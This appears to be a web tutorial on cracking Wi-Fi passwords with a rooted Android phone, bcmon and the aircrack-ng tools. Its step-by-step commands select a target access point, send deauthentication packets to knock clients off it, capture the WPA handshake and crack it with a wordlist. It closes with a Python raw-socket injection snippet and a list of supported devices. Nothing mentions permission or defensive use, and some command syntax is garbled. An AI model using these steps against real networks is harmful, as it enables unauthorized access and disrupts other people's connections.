REQUIREMENTS:
Root your Android phone with the ROOT-UPDATE-SuperSU-v2.46.zip
Download bcmon Apk here: Click here
PROCEDURES:
Step 1.) open your terminal emulator or run bcmon Apk... and run airodump-ng wlan0 command if your device chipset is supported for packet injection then everyone will work fine just like mine, as for the video, I used My Samsung S2 GT-I9100G Model and I was Amaze that this is supported. below is the list of supported devices that you should check, The list is not updated so be sure to try first before concluding that it will not work.
Step 2.) Select target AP by running command in android terminal: airodump-ng -c [channel of target AP] --bssid[AP BSSID] -e[AccessPoint Name] wlan0[Wi-fi interface card]
Step 3.)De-authenticate clients connected to the network by running the command
aireplay-ng -0 0 -a[AP BSSID] -c[Clients Connected to Network] wlan0[Network interface card]
Step 4.) Only run this codes once you already capture the WPA Handshake or WEP packets
aircrack-ng -w[path of your wordlist] --bssid[Target BSSID] -e[name of Accesspoint] wpa.test.cap[WPA Handshake] wlan0[network card]
NOTE:
for beginners: the square brackets of the codes is not to be included when you type the codes
Currently tested on the following devices:
GS 1 - Cyanogen 7
GS 2 - Cyanogen 9 & 10
Nexus One - Cyanogen 7
Nexus 7 - Cyanogen 9
bcm4329 - chipset
bcm4330- chipset
EVO 4G- chipset
Desire Z -chipset
Galaxy SII (I9100)
Galaxy S II(I9100G)
python packet injection code
import socket s = socket.socket(socket.AF_PACKET, socket.SOCK_RAW) s.bind(('wlan0', 0)) s.send('Hello World'*20)
0 Comments